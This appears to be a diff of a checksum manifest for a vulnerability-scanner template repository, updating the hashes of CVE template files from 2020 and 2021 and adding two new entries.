+http/cves/2020/CVE-2020-23517.yaml:33b667b0d1a20cf34cc3f35a784d6a744fd200f5 http/cves/2020/CVE-2020-23575.yaml:24659de3930fd8dca762d607f15801fb27c47fa7 -http/cves/2020/CVE-2020-23697.yaml:61d274ea92f2320e0af0cb8c91cfdfcb7d78f9a6 +http/cves/2020/CVE-2020-23697.yaml:4fd1fcc31ec48e2771f37732d31a1d4094fd76cf http/cves/2020/CVE-2020-23972.yaml:86f0461aab638510be774d4586f064a1d4068131 http/cves/2020/CVE-2020-24148.yaml:67d31efc4ecd8492c56a328716cb100d66b20604 http/cves/2020/CVE-2020-24186.yaml:b627b7fe3f4ea42dc4bb20c381621d32190bb782 @@ -1241,8 +1281,8 @@ http/cves/2020/CVE-2020-24550.yaml:c70260bc02ffb16bbc98f96d3c6a2ea0269fbac4 http/cves/2020/CVE-2020-24571.yaml:0773e9008a1dd7d80c3ebd6c9e868093e6fc7c7d http/cves/2020/CVE-2020-24579.yaml:4e54658141166df415874ca65461d6e39ab21f4b http/cves/2020/CVE-2020-24589.yaml:e611cb8d8d5b336f898d148794a0e16a50dc8c86 -http/cves/2020/CVE-2020-24902.yaml:c7a433042eb4f7c06dfdf709d4edcc46fb19cc58 -http/cves/2020/CVE-2020-24903.yaml:2df0494ea04764da0b4f88cca0f48d97067a3c6e +http/cves/2020/CVE-2020-24902.yaml:fdc6d201ee540cf8c78bfc02b91faf20911320ab +http/cves/2020/CVE-2020-24903.yaml:c41f75ade1b76701bb1664bef609ab6f5414e8f5 http/cves/2020/CVE-2020-24912.yaml:da86d2e250e0a5ead3c919ff8c165ec429547ae6 http/cves/2020/CVE-2020-24949.yaml:7a5a2a3b526f66496ec94bbfbad097c9bd11317a http/cves/2020/CVE-2020-25078.yaml:233e307ccfc1f0d4229ad2b02aaa0a6b5a13a0e4 @@ -1257,15 +1297,15 @@ http/cves/2020/CVE-2020-25864.yaml:81804a8a5870d68de346cfe6c6a973ca13b906e9 http/cves/2020/CVE-2020-26073.yaml:092608f10cfbec677347eab13afc0b2f1b3860e7 http/cves/2020/CVE-2020-26153.yaml:a5a1ad587241f67080c2203f63dca0220afe1427 http/cves/2020/CVE-2020-26214.yaml:b69d922f61e54ed48791a927537c288d2b24a80f -http/cves/2020/CVE-2020-26217.yaml:e3c5485a2b57eaeb5837ce78c210dded592c6e03 -http/cves/2020/CVE-2020-26248.yaml:523f4fe41057a175852c2f333ea790d4639b5544 +http/cves/2020/CVE-2020-26217.yaml:f10cb215f12458bb66bb0bc9548b31e25b7abd18 +http/cves/2020/CVE-2020-26248.yaml:3ec2eeb375260c9afcc411450f044f43929ceb74 http/cves/2020/CVE-2020-26258.yaml:c03cd54ff7b1df4df6cf83929265811c22862afe http/cves/2020/CVE-2020-26413.yaml:ed8b1903bf507377036d5243daae3d086554390e http/cves/2020/CVE-2020-26876.yaml:b0e45fd2e0f4f94da93ff1b802d0f4221f511c9f http/cves/2020/CVE-2020-26919.yaml:39845be60bfc669c019caad1feab162302d0b3c8 http/cves/2020/CVE-2020-26948.yaml:71ae77b1771b70e3e8641f7ff7e9d03cfdedb6d1 http/cves/2020/CVE-2020-27191.yaml:c2010001ed0c30496285196a0dc59af5ed2590c7 -http/cves/2020/CVE-2020-2733.yaml:27f52598b78d4e39337f182da4e77e86d98ca692 +http/cves/2020/CVE-2020-2733.yaml:cca3f74a752e7503134b2474c5b4e62837c42aaa http/cves/2020/CVE-2020-27361.yaml:00837d374b934474c9062da012f4b4a784ce6e8f http/cves/2020/CVE-2020-27467.yaml:700f8d4063e2abe6d0ffa111c2a4796846679212 http/cves/2020/CVE-2020-27481.yaml:819296335f57f930b2f119b2b25cf339ca874f7d @@ -1276,20 +1316,20 @@ http/cves/2020/CVE-2020-27986.yaml:136fd3ca4193eb4e0712595bbb6ed7aef321be8d http/cves/2020/CVE-2020-28188.yaml:c420030e17aa66104914b27eeae8865eebd61e0b http/cves/2020/CVE-2020-28208.yaml:bf13f2a4afa828e1d49e0fac6c02758ea1c84e09 http/cves/2020/CVE-2020-28351.yaml:19143ce3ec0a756d2f308f92b27cd5c5d2bd3a28 -http/cves/2020/CVE-2020-28871.yaml:babff56faec67d16fac55f74e4e0851166c4b1bf +http/cves/2020/CVE-2020-28871.yaml:b4a42952342751eb68c9bdf392d6d3ecaa845535 http/cves/2020/CVE-2020-28976.yaml:2f6d709ee8879ee4c78886febdff47dfd80c3098 http/cves/2020/CVE-2020-29164.yaml:d9a5213b36770d24a091e7a411d4c04e7a98b8bf http/cves/2020/CVE-2020-29227.yaml:e21af265bf58f3f2ad9598b7d8c12c30535023c8 -http/cves/2020/CVE-2020-29284.yaml:2033b9338f7bd39df2f4fd2d4ecc13b9785fb632 +http/cves/2020/CVE-2020-29284.yaml:28aeaceda74b7c3ad0dfd0d0284ece3f23de2df7 http/cves/2020/CVE-2020-29395.yaml:76621812638940704de9abd94951845aeb70fcf0 http/cves/2020/CVE-2020-29453.yaml:c0d0b4be27d1166ea3636db957d1542817294cd0 -http/cves/2020/CVE-2020-29583.yaml:5125d785e93fda9edb3332f4628d471ef2b008ca -http/cves/2020/CVE-2020-29597.yaml:d4ba964694d804f09f0b43768f79a77439daa3b1 +http/cves/2020/CVE-2020-29583.yaml:7b8ae8deb15e6f578850b09d5aef7d13112afb7f +http/cves/2020/CVE-2020-29597.yaml:744afc91d498b4c3c76f36e2b94e5f5e0567abcd http/cves/2020/CVE-2020-3187.yaml:f24c047caafa8d2a390e6a554000304a8348b05d http/cves/2020/CVE-2020-3452.yaml:e3db6c1ab42a97e0774b4c1806c58a5bac20dbe2 http/cves/2020/CVE-2020-35234.yaml:852a543f982e34fd1846ba14ae59070d557f172c http/cves/2020/CVE-2020-35338.yaml:2e7aaed45f07d8098a229e448687ee9db8b7aaa5 -http/cves/2020/CVE-2020-35476.yaml:ac16fea72361d6fd7cfae981987bdd24caa6c1d8 +http/cves/2020/CVE-2020-35476.yaml:71d35fb39d1383b19963d35da152974c7ee9a952 http/cves/2020/CVE-2020-35489.yaml:aeda2bb9e45bc5a1e7a8d21a21f38e29890988c0 http/cves/2020/CVE-2020-35580.yaml:73fe325bfb19913cf3ece302723108eab8fb4aee http/cves/2020/CVE-2020-35598.yaml:63f63712a0d0fc827b657a6874aeb769a05f9709 @@ -1300,7 +1340,7 @@ http/cves/2020/CVE-2020-35749.yaml:ca477f23914de62d3a525c8ac9c6c0af1c8ae3bf http/cves/2020/CVE-2020-35774.yaml:972b0b3945e4543684ff77dc7203b5663429b04c http/cves/2020/CVE-2020-3580.yaml:e640aa3625d349d514389a8c50b27cd433fb0985 http/cves/2020/CVE-2020-35846.yaml:c11ad707d109784458dc81e0ea52715d146f1872 -http/cves/2020/CVE-2020-35847.yaml:777852e375f9a103e57cac2fb94d11b5ae799ad4 +http/cves/2020/CVE-2020-35847.yaml:73a9bac50937850f6b20733631a23794be97ad16 http/cves/2020/CVE-2020-35848.yaml:8d913ecc9f2a82c81c7ac3c15a2aaaf95068390b http/cves/2020/CVE-2020-35951.yaml:c2c755582bda49a37ccaf342009729bf933b952b http/cves/2020/CVE-2020-36112.yaml:2393d1a0fb2bddea1caa59cfcb0c9eb9996038cc @@ -1308,8 +1348,8 @@ http/cves/2020/CVE-2020-36289.yaml:3afed85c52fd88b42aa75768755e5805e76e5f14 http/cves/2020/CVE-2020-36365.yaml:1a981b021d0172219e2c629cd07db4c9ff0825ab http/cves/2020/CVE-2020-36510.yaml:6eee93819f915b76e954cc498be12ead6b6b2875 http/cves/2020/CVE-2020-4463.yaml:4b36f15af2e3b56fa939934d399ab59a39cc6247 -http/cves/2020/CVE-2020-5191.yaml:2eba009bc7151f6011f3c1dc24c140480afc2f8a -http/cves/2020/CVE-2020-5192.yaml:b3119f019d919269f355bbdee29e2b1c3def813e +http/cves/2020/CVE-2020-5191.yaml:4dea5beb9fb536ca9154b907737df36cde3edc22 +http/cves/2020/CVE-2020-5192.yaml:a0ba844f5648ecce935a5a69019594737d3d1041 http/cves/2020/CVE-2020-5284.yaml:fd28857c875469ccf2e3646795d803241bf08b9e http/cves/2020/CVE-2020-5307.yaml:a46eb629d6469f3e0911dd71889a5ce8933315cf http/cves/2020/CVE-2020-5405.yaml:d4d234f91250a30e175feb786ac2eaf8b5f42c47 @@ -1318,14 +1358,14 @@ http/cves/2020/CVE-2020-5412.yaml:237d89fef048fe73cadaa0f3faa3d8625506d0bd http/cves/2020/CVE-2020-5775.yaml:4914818159b4e8e4849416cce39c6274b0e16e54 http/cves/2020/CVE-2020-5776.yaml:d1edb9bbfb567b9a7a98a8710be720b16bf8fc87 http/cves/2020/CVE-2020-5777.yaml:228b68f33ac36f720863ca3ef829d56384fdf195 -http/cves/2020/CVE-2020-5847.yaml:da4db7b9f89a4c5a14218d5f1b33b580bd17a6d8 +http/cves/2020/CVE-2020-5847.yaml:dc42d68c6a9630249434129ac2616779e16dd85b http/cves/2020/CVE-2020-5902.yaml:e6eb7cae1e2f8d98e6a2a53a5be418d592f04dac http/cves/2020/CVE-2020-6171.yaml:3619687ec22c65d883542ef07c3a708f5aa239dd http/cves/2020/CVE-2020-6207.yaml:6103a422a05d72c06cf1620a3352d325fd8735d6 http/cves/2020/CVE-2020-6287.yaml:3a00bd9f2d785de0fc2325833e7d3e461fd7adab http/cves/2020/CVE-2020-6308.yaml:0bbc255f49f8a4af0aedfe228686962ce108848c http/cves/2020/CVE-2020-6637.yaml:2b6e354bca97b14ee1c2433e7bcc2a7f5dd41160 -http/cves/2020/CVE-2020-7107.yaml:6368bab8160f6b5c642099debe21942fb745c36c +http/cves/2020/CVE-2020-7107.yaml:7d6f8270dd46d533393a9d873d719fbea9c186d1 http/cves/2020/CVE-2020-7136.yaml:75f471d9920ad33144c3daaac32274b50be78e76 http/cves/2020/CVE-2020-7209.yaml:46e81cfc1d21cacd5b26966175b41152b7060172 http/cves/2020/CVE-2020-7318.yaml:574bf80b59dafea2bce4fd40b86583ee531cc608 @@ -1346,11 +1386,11 @@ http/cves/2020/CVE-2020-8641.yaml:3425c472418b778fac7bb90d64e469f8370721d0 http/cves/2020/CVE-2020-8644.yaml:b2288d0ff157b7a3f4f45943e65716cc835f4215 http/cves/2020/CVE-2020-8654.yaml:e029f02c5012e18159b2646764825c585d2c7461 http/cves/2020/CVE-2020-8771.yaml:e640be274e5cac8a4bf9fbcae61c75f28de53683 -http/cves/2020/CVE-2020-8772.yaml:06434481d53c8cd51a3e30997aba259efd2344d9 +http/cves/2020/CVE-2020-8772.yaml:60cbd2c28e29fcd71955899ba05675d6bfa34ade http/cves/2020/CVE-2020-8813.yaml:f1a13dd5798ef59bef145a4c8af3ed57a6bc98ec http/cves/2020/CVE-2020-8982.yaml:bd72a3f70ba3c9de9c934829bbbd5c9a5ddfc05c http/cves/2020/CVE-2020-9036.yaml:d66f740f315552dd4195e681ad542f0a5e641ab0 -http/cves/2020/CVE-2020-9043.yaml:3966b759cd01c17652f33a3ec6a79f6308352bb8 +http/cves/2020/CVE-2020-9043.yaml:a971b3562a4724e6ccf496d17a1aeb8d705629b8 http/cves/2020/CVE-2020-9047.yaml:5b5655c9ee8053ff41dd1308d47b6cd72afdbeaf http/cves/2020/CVE-2020-9054.yaml:76f13d034b100fba280b8f55aee8d2c57d55b5b5 http/cves/2020/CVE-2020-9315.yaml:6d6bc56300bd98265babee79c4fff34f29b76da4 @@ -1362,8 +1402,8 @@ http/cves/2020/CVE-2020-9483.yaml:c8335374b114ceb785b233d3f101937b89f63ed7 http/cves/2020/CVE-2020-9484.yaml:dff680405eeabc12f885263c35935251deb0917c http/cves/2020/CVE-2020-9496.yaml:52925a55de5ae997f8cb6df76a3161f4dd13a50c http/cves/2020/CVE-2020-9757.yaml:598424991dde28fe6eec8c370998f695df86a66b -http/cves/2021/CVE-2021-1472.yaml:5f4836db8a3787beae0f459b3caed4d21b9093bc -http/cves/2021/CVE-2021-1497.yaml:15655c96de965d751666a1b4353b6b1b51ad8897 +http/cves/2021/CVE-2021-1472.yaml:286ddb8ab4b69313cc896cdd4e78d263170cce19 +http/cves/2021/CVE-2021-1497.yaml:7089f7073bbf30d5c239989a0c37cd6056c64999 http/cves/2021/CVE-2021-1498.yaml:818733cb47e5e6649faf935ccd1e380241b00ce6 http/cves/2021/CVE-2021-1499.yaml:850b16f0bbc6b2daa8f6d79549745940f17afeac http/cves/2021/CVE-2021-20031.yaml:9754993b66765cc4da9f03db3768a51cb85b8ec9 @@ -1372,13 +1412,13 @@ http/cves/2021/CVE-2021-20090.yaml:6315bc6988ca561b9e595fae0d934a079cd115c2 http/cves/2021/CVE-2021-20091.yaml:00bef44602cb0afd5c6f7110193c748ab8f9121d http/cves/2021/CVE-2021-20092.yaml:66fcc9ce5345c10015c65dda4176776914aa3cf8 http/cves/2021/CVE-2021-20114.yaml:c373430f3c21e58010cf68b2bd8f1706b50d7977 -http/cves/2021/CVE-2021-20123.yaml:a15cd1d0703bed8d4db30256738ebbe994c8ced5 -http/cves/2021/CVE-2021-20124.yaml:24fe0bfa3ef82ab914966017f5d4a2644004770b +http/cves/2021/CVE-2021-20123.yaml:2c41fae1cefc86cc0a2ed56e4686fcac8a7c01d5 +http/cves/2021/CVE-2021-20124.yaml:a26a6dbc033f68987e7e1e360b696d1f42621f28 http/cves/2021/CVE-2021-20137.yaml:2b825f3c77f26070275c007e06b25a4b236a5c7c http/cves/2021/CVE-2021-20150.yaml:e5b752a071d20a95abd95a4040913c3a4a6d852c http/cves/2021/CVE-2021-20158.yaml:3d91d16ffa0d257fc57252fb93df56d8514f535f http/cves/2021/CVE-2021-20167.yaml:6070619157ef131d41645acd1fddd539260f5a0a -http/cves/2021/CVE-2021-20323.yaml:56a8821aff00fc7ca2be0e2a33ec15dae1159bbc +http/cves/2021/CVE-2021-20323.yaml:453ad509d1e3313a76701dea9715528474a5f896 http/cves/2021/CVE-2021-20792.yaml:fe26088f15c36c470344a6d9a08635f750f9c1d1 http/cves/2021/CVE-2021-20837.yaml:239be295d2710ff39efd694d03685e46d0d0d372 http/cves/2021/CVE-2021-21087.yaml:e152b1becc0f596e04db1e40e3eeb12388af0484 @@ -1387,18 +1427,18 @@ http/cves/2021/CVE-2021-21287.yaml:6697278beb5cd474625d8e53d5c239642f2a10b1 http/cves/2021/CVE-2021-21307.yaml:669c74f41e5e5c9a8da1c1c5c36f10f2444eb29f http/cves/2021/CVE-2021-21311.yaml:aaa8c235660a9a6dd325f2758a0eec0094e73ecd http/cves/2021/CVE-2021-21315.yaml:053f74ab8294ac172be4daeb83b763bfd89dbe1e -http/cves/2021/CVE-2021-21345.yaml:1092b252ec802720ca25d3171a26cc17b45c033f +http/cves/2021/CVE-2021-21345.yaml:6b66165292f268fa48384d2afd3bbf22e9ddabf2 http/cves/2021/CVE-2021-21351.yaml:06b04c58fcc098885749880d338f3d51ec4b50b6 http/cves/2021/CVE-2021-21389.yaml:3bd0fbdb516cd80a0b488cd6691260eebaa78e40 -http/cves/2021/CVE-2021-21402.yaml:1a1d62a46f5c99aa8c6c762e774d6f2382f490a2 +http/cves/2021/CVE-2021-21402.yaml:3c34519579a07e81d2bff6b3e73b123ef22eb192 http/cves/2021/CVE-2021-21479.yaml:08312209d33e6a826be67cd5d2f452541cc6b8c5 http/cves/2021/CVE-2021-21745.yaml:b4b5f59c5b29a58a50f4677beeacd40b3c8b4c24 -http/cves/2021/CVE-2021-21799.yaml:0466da25636e1ca72b61b33370ed48301af6fc01 -http/cves/2021/CVE-2021-21800.yaml:8588fa59f2aec0e5c61d52a4c033f662d23feaaa +http/cves/2021/CVE-2021-21799.yaml:d290f37e97ff189031452ff0892b0d437535b189 +http/cves/2021/CVE-2021-21800.yaml:55d42a6c66e2cf9357684c43b4b2bbb3713fdf5c http/cves/2021/CVE-2021-21801.yaml:722d05be6cf176b60e9893f83ee717e6f81d0678 http/cves/2021/CVE-2021-21802.yaml:2cd6c43a2dd03fa5fde0fdb65ad7ae2dd9145ac7 http/cves/2021/CVE-2021-21803.yaml:b08564f9400f40a1efb65fd6a0c912801b2e4c38 -http/cves/2021/CVE-2021-21805.yaml:b4799989a5c3d2a26306d2dc8809f33497ae7ec4 +http/cves/2021/CVE-2021-21805.yaml:f6db5014e30a259a6029695bee786534e6ee3413 http/cves/2021/CVE-2021-21816.yaml:30aa644b462caf2d94f9ed30ebe8fbde7e929e95 http/cves/2021/CVE-2021-21881.yaml:9906ffcf3470a1b14fff1de29f819a49c58ff638 http/cves/2021/CVE-2021-21972.yaml:e703045537bf487b23d0afebddd9351925c72129 @@ -1414,25 +1454,25 @@ http/cves/2021/CVE-2021-22145.yaml:2f9db5b8ceb2a018f75a6030d9539c5a55e11c41 http/cves/2021/CVE-2021-22205.yaml:902031928a2d2124300ce459d42c942cf386fd74 http/cves/2021/CVE-2021-22214.yaml:7030ce16990aaa17c4f754dea452e3beb6698246 http/cves/2021/CVE-2021-22502.yaml:dbbfc5da75064290d3f83e5a773647a14fb25fe5 -http/cves/2021/CVE-2021-22873.yaml:98ed49b0b755440ed3bdbb2c63524d1318e10716 -http/cves/2021/CVE-2021-22911.yaml:c1a40ec90481402c0e42befcf2fff320ede93b5b +http/cves/2021/CVE-2021-22873.yaml:13cd8eafa0fde06f77d25afb16e8070448695166 +http/cves/2021/CVE-2021-22911.yaml:dfad25f0bb99938276e318df200b0985d0c88336 http/cves/2021/CVE-2021-22986.yaml:2ecad4022d95fa5099ad06d6f5dcda483097ed7e http/cves/2021/CVE-2021-23241.yaml:6fe1b483f150b756b913efbd3d74b785c49ac731 -http/cves/2021/CVE-2021-24145.yaml:67ee862a9447fcc17a782703a50bb5d07577662c +http/cves/2021/CVE-2021-24145.yaml:89d98979c055f9e03e95daa845d5d247e45e0110 http/cves/2021/CVE-2021-24146.yaml:e33f3d93664f37e53bab920372415694f56c97c2 -http/cves/2021/CVE-2021-24150.yaml:3c72bc3526d0e3b6522e3c8799dcc176bad20a7c -http/cves/2021/CVE-2021-24155.yaml:8620d6e96bd5a337d4a840392efd393a8e8a2876 -http/cves/2021/CVE-2021-24165.yaml:feae93f70ac70ead9d4bd1e8d5cdc04329dc2b76 -http/cves/2021/CVE-2021-24169.yaml:58832e5b1fe3219272ff594e84cab4e99d0ae9b0 +http/cves/2021/CVE-2021-24150.yaml:7976b2c9af20fd8532586b1a32a7dd8fcf409b5d +http/cves/2021/CVE-2021-24155.yaml:3a6bf54eab123a8eb0e8de74ea1a9386693b2ac1 +http/cves/2021/CVE-2021-24165.yaml:3458454c67ea192fc2d898d7351411e81d89ee84 +http/cves/2021/CVE-2021-24169.yaml:4dbd733ae5e17c5bf70f3c29ca10b0c15a3302e9 http/cves/2021/CVE-2021-24176.yaml:9034fd48d467aa8ed262236bbcc66629e299a3d2 http/cves/2021/CVE-2021-24210.yaml:6a8bb7fbafce98d4a3850107aedbfd468404cf75 -http/cves/2021/CVE-2021-24214.yaml:c4e21c3a7bf05bc37be9c6f43e4148d987936585 +http/cves/2021/CVE-2021-24214.yaml:55dcb42b06aa88e66522aeadc9531ba004b6f30f http/cves/2021/CVE-2021-24226.yaml:6bdd6d3e281baf60ac482df622e9b6f26ef6414b http/cves/2021/CVE-2021-24227.yaml:47556e3c960e831ee17679fc2c58ed894f9c0a7f http/cves/2021/CVE-2021-24235.yaml:29dafa92ba16138d90e30b7934f86cee0fc3e299 http/cves/2021/CVE-2021-24236.yaml:f6e231bdf47a5ea5f94bd0bfa6cd37dd21cc500d http/cves/2021/CVE-2021-24237.yaml:6bc3383743a564c6c74edf34f96f21746cda048e -http/cves/2021/CVE-2021-24239.yaml:d584b3e2fbb721ff71bba024b17e8bced5e0a936 +http/cves/2021/CVE-2021-24239.yaml:28c9c5451cde9aaed3d57702480ef7448454aad2 http/cves/2021/CVE-2021-24245.yaml:230df38606e86e5eb38770092528997a5c430a15 http/cves/2021/CVE-2021-24274.yaml:3b86fccf35435e0691081a3a7ecc0051793c2012 http/cves/2021/CVE-2021-24275.yaml:5275dc7ff42c8e1cf1dec65cd85bc9ab9da63cf6 @@ -1440,7 +1480,7 @@ http/cves/2021/CVE-2021-24276.yaml:7b3bd2d97b28cdbac05662ecfd0d7817dd50f3e9 http/cves/2021/CVE-2021-24278.yaml:348f19bc6421dfeb9b9389b6e1b4a0c9cf40b26e http/cves/2021/CVE-2021-24284.yaml:3e86c8048dda35695b04a28504de37b63633725d http/cves/2021/CVE-2021-24285.yaml:084afa0f538c0a98faf4a3c072dd9f25ec39857a -http/cves/2021/CVE-2021-24287.yaml:c28fdd02b6b8a9ca685837d8230974eb46fee8ee +http/cves/2021/CVE-2021-24287.yaml:9b38524b317818d041a335ea65828d8a5aed46e1 http/cves/2021/CVE-2021-24288.yaml:918c4dd7f9831ba1082675dfa1f3934a9ac52f92 http/cves/2021/CVE-2021-24291.yaml:fa7414cd4869fbbe4b607745c604aac953e2fb14 http/cves/2021/CVE-2021-24298.yaml:9d5a76c3f68e746611f9475c11f538accc79528a @@ -1448,9 +1488,9 @@ http/cves/2021/CVE-2021-24300.yaml:ce68406b1e5c21496265734b8f95049710586820 http/cves/2021/CVE-2021-24316.yaml:f638572b1fa4415612202b966b864d6b92b57294 http/cves/2021/CVE-2021-24320.yaml:5d5a5cf6f223a50a976e8f23e0c0c3fea27a0a24 http/cves/2021/CVE-2021-24335.yaml:8799f0b8e7c873c4b4cac2f83e284ce637ab51f3 -http/cves/2021/CVE-2021-24340.yaml:fb466bc64cf7c27529f2c8cb85614ea7cf8eeb5e +http/cves/2021/CVE-2021-24340.yaml:855bb39ae485ce3df8905f932887c9c4cf6b6e9d http/cves/2021/CVE-2021-24342.yaml:7b37a081c0de89e0462c0dcd32d492e09bebdaa0 -http/cves/2021/CVE-2021-24347.yaml:811fca0fc3ba77025654b1d35a3ab3451722e0bc +http/cves/2021/CVE-2021-24347.yaml:ad5a1f41f73b6b8ade1c096eafe3c38921b53a47 http/cves/2021/CVE-2021-24351.yaml:47d2406cced1b7ceac7a493dcbd6c9f6a2e6650f http/cves/2021/CVE-2021-24358.yaml:899206151dba879d27a37ff89a4d32592feeb090 http/cves/2021/CVE-2021-24364.yaml:0cedcceff2774022147df344eae6da2d9952c31c @@ -1459,60 +1499,62 @@ http/cves/2021/CVE-2021-24387.yaml:23b832dffd53f68a0b9f90ed02aedc9ae861b4aa http/cves/2021/CVE-2021-24389.yaml:6af6355d2c3b4dc5bb716c06e1692f34595c99f6 http/cves/2021/CVE-2021-24406.yaml:605a1802602dc413448a33f5069e56f23a02394d http/cves/2021/CVE-2021-24407.yaml:cbb05700ba6905ae312562608736756aa4566cbb -http/cves/2021/CVE-2021-24435.yaml:a81b890069d211867908c5393aa21003238ecc42 -http/cves/2021/CVE-2021-24436.yaml:68a90c92dedaa666193de674c42217ff3f7f05ae -http/cves/2021/CVE-2021-24452.yaml:7cd11ddb740ef9edaac8f3a7311998f34a7e7d1a +http/cves/2021/CVE-2021-24435.yaml:4a795b1dbe279b6f7f8e8cafd1ac3f5c71217762 +http/cves/2021/CVE-2021-24436.yaml:2b77064019d96f74adb6699c9e579a783858fb91 +http/cves/2021/CVE-2021-24452.yaml:961bad83e2c7f66d242281e4f084fc7bab156b3d http/cves/2021/CVE-2021-24472.yaml:8412343541aeaee4b31dc9df2709ef749c0a8e4c http/cves/2021/CVE-2021-24488.yaml:d1460b5fec93d5affeaa3aabcfe28db0b05f8f8e http/cves/2021/CVE-2021-24495.yaml:d39a5045a10d8938c4914ce17330665fca6dfda3 http/cves/2021/CVE-2021-24498.yaml:12fa0261ea6b36b837eb87d8ce1d803a2f2cf0aa http/cves/2021/CVE-2021-24499.yaml:33b5737b57d503aedbc2dcdc2e5796b8e83e1bc4 http/cves/2021/CVE-2021-24510.yaml:f1b05e8e7b43e1c48cf7587a20a411d986950122 -http/cves/2021/CVE-2021-24554.yaml:e1cbcc66ea99704e27a49395c1771e7aa43418a3 -http/cves/2021/CVE-2021-24666.yaml:b12e8833af44d2301cae37b8c5067480e98780ca +http/cves/2021/CVE-2021-24554.yaml:93b9442db6d766a5cc76cc0293ddbb0576636b6d +http/cves/2021/CVE-2021-24647.yaml:1243d5c384ad193a0bff7298f29ed31ef0c3dda0 +http/cves/2021/CVE-2021-24666.yaml:376c70974b03358c46a1aca529985b75da028fc2 +http/cves/2021/CVE-2021-24731.yaml:5fa67ce002d0bf077f2e94f2f7416893de80a07c http/cves/2021/CVE-2021-24746.yaml:793d7ce0a9e66c09382bf4feafdc14d732a5d2c8 http/cves/2021/CVE-2021-24750.yaml:b52e1668c5c538502cab5d2cbb5c394e0d684f3d http/cves/2021/CVE-2021-24762.yaml:34f00ab9034e789bc3eab8b972a0d6b43ff5e725 -http/cves/2021/CVE-2021-24827.yaml:450643afaf338cdd0e764792be247131decec66b -http/cves/2021/CVE-2021-24838.yaml:bdd005847b5acea23f1de677ea325713a29d7f4e -http/cves/2021/CVE-2021-24862.yaml:39d572d36cfc0326a7c45b95836ddbdd53631485 -http/cves/2021/CVE-2021-24875.yaml:0f618246b53ec078ed19cc08a95c90781842b233 +http/cves/2021/CVE-2021-24827.yaml:8eaec237bb5a6ffb379226e1e7362923c3600af9 +http/cves/2021/CVE-2021-24838.yaml:46459e692ee5d4f840a26afbf883abd01f994608 +http/cves/2021/CVE-2021-24862.yaml:acea6ff5f197ee3c3f6db26302f3faff53e9fcd5 +http/cves/2021/CVE-2021-24875.yaml:55ef32fe43ae978b2bc85160913c3f173cfebb4c http/cves/2021/CVE-2021-24891.yaml:c0012678ca4e62a9261394077f8374dff52a35d4 -http/cves/2021/CVE-2021-24910.yaml:c61da8ad9175119ff80ceddc38341c4cd4c68a2f -http/cves/2021/CVE-2021-24917.yaml:893ca36e9db1a17e7056e2c8c07cc2173faffb07 +http/cves/2021/CVE-2021-24910.yaml:ab2d1446ab0f5bc9795a0bad2c58963b72e1973d +http/cves/2021/CVE-2021-24917.yaml:bce1bbef608083b6b70e1ae27f78642945f6adfe http/cves/2021/CVE-2021-24926.yaml:00102a5997ac472cdd01155abf741a2524457218 -http/cves/2021/CVE-2021-24931.yaml:2da20f5a116bbf7e93494d8258cc1195a9f20e79 -http/cves/2021/CVE-2021-24940.yaml:a34182ee54e4fe73934bd45cdeeb2d51838f65b9 -http/cves/2021/CVE-2021-24946.yaml:473dc476a2d612a236763b5ec82ce5b716cae9f9 +http/cves/2021/CVE-2021-24931.yaml:645ad3e2fccacb130fc59b69e88687d625ae8b5a +http/cves/2021/CVE-2021-24940.yaml:125a27db5584c446cc766d8404e6980ee3c26736 +http/cves/2021/CVE-2021-24946.yaml:29192e28c518ef67c7e016d2b41b5f4e7d957d92 http/cves/2021/CVE-2021-24947.yaml:c09fe321740b912360d6fde4f1fb4297f351f320 -http/cves/2021/CVE-2021-24970.yaml:655b254dd39ba1dccb2f555c6b16dff8c1b98d03 +http/cves/2021/CVE-2021-24970.yaml:d285c8803c37851a7b067de085d1b98c51376ff3 http/cves/2021/CVE-2021-24987.yaml:99c24e87700bffb41ac5e8e0b446d6d8f7083cab http/cves/2021/CVE-2021-24991.yaml:684dfb55ec39d18566180d568b05063b5e29b870 http/cves/2021/CVE-2021-24997.yaml:e44b2cab910c778c2b7923528b75d9e9c6969d02 -http/cves/2021/CVE-2021-25003.yaml:a7b3e73be86f5f55ef3195a5a00988d99aeb3ffd +http/cves/2021/CVE-2021-25003.yaml:be7808cc2d580a985911af24f70cd116282524d1 http/cves/2021/CVE-2021-25008.yaml:9f75d7f57936f3569375ac0bf38b8c6aa8ad6099 http/cves/2021/CVE-2021-25028.yaml:11e47a024df59edf76120716bdfb9855b2b6370d http/cves/2021/CVE-2021-25033.yaml:5e9e335513a72f8e155ff60b5f288597ce273ded http/cves/2021/CVE-2021-25052.yaml:4d6968f78d5ff785cfe03cc9e28310e078d599aa http/cves/2021/CVE-2021-25055.yaml:01f0e48edbf2d915a3feaada3d9c72983ddb5c6b http/cves/2021/CVE-2021-25063.yaml:7044312c70822ad185eea254ae3434d8b39acdbf -http/cves/2021/CVE-2021-25067.yaml:489466346b8cb191f47a1aec53c07ddfecb2b28d +http/cves/2021/CVE-2021-25067.yaml:1334c60b54de1343801b71f297ed4ca11cc1b1ca http/cves/2021/CVE-2021-25074.yaml:798b4fa48b608729201caf72f277ead674adaec3 http/cves/2021/CVE-2021-25075.yaml:bc7c2a65f3eb39022b8bd0406d315333e1c018a6 -http/cves/2021/CVE-2021-25078.yaml:f72f5fd6b1a6dc8af21627ab0e79f32c63dda1df -http/cves/2021/CVE-2021-25085.yaml:d4d1d8e868b4966c7dd9666053ba60dc22311ca6 -http/cves/2021/CVE-2021-25099.yaml:24ef8ed84b7c4c78a8db502a28c492863b856ce0 -http/cves/2021/CVE-2021-25104.yaml:b0d35212568d8347bf0f0ef5133b29cd8dd168f5 +http/cves/2021/CVE-2021-25078.yaml:387a1ce3b9115aec8f9d0213449240fd343640d5 +http/cves/2021/CVE-2021-25085.yaml:af36dea5064a6e1e12e6d8a53e4b6b599a17894c +http/cves/2021/CVE-2021-25099.yaml:76d3c88bfd27e3e27271678ffd757836d5e564e9 +http/cves/2021/CVE-2021-25104.yaml:9ecb13f52933ae806d2c79068a636d60101b14f0 http/cves/2021/CVE-2021-25111.yaml:a961a22dbb5efa4c3e176c6e481f1127294c3767 http/cves/2021/CVE-2021-25112.yaml:883a7babeaeab3166cad1874fb8668828e972464 -http/cves/2021/CVE-2021-25114.yaml:be01e80a44eee0f3621fd923a68a08e539dc4b45 +http/cves/2021/CVE-2021-25114.yaml:2abff0e6f297c5cce2e1d0397d62679566848133 http/cves/2021/CVE-2021-25118.yaml:98ca94ac9324bd1d5cd666b27ace2400e8041664 http/cves/2021/CVE-2021-25120.yaml:d283482ce598125dc47b8eab273c631bd26ce74c 